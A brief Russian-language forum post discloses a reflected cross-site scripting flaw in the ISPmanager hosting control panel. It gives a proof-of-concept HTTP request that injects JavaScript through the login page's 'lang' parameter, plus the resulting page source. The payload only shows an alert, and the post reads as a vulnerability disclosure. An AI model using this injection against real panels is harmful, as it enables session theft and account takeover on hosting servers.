[Intro]Доброго времени суток. Ковырял бложек, наткнулся на сабж. В сабже ХСС. [PoC] Code: GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1 Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0 Host: site.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* Code: <script language="JavaScript"> var imgpath = '/manimg/aqua/'; document.write( "<base href='"+location.protocol+"//"+location.host+imgpath+"'>" ); var binary = "/manager/ispmgr"; function setThemeLang () { var theme = "aqua"; var lang = "[COLOR="Red"]";alert("PWNED BY p1r0!");//[/COLOR]"; for ( var i=0; i < document.authform.theme.options.length; i++ ) if ( document.authform.theme.options[i].value == theme ) { document.authform.theme.selectedIndex = i; break; } for ( var i=0; i < document.authform.lang.options.length; i++ ) if ( document.authform.lang.options[i].value == lang ) { document.authform.lang.selectedIndex = i; break; } } function setQ() { document.cookie = binary.substr(binary.lastIndexOf('/')+1)+"4="+ document.authform.theme.options[document.authform.theme.selectedIndex].value +":"+ document.authform.lang.options[document.authform.lang.selectedIndex].value +":0; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT"; return true; } </script> Офф сайт разрабов: http://ispsystem.com/ru/
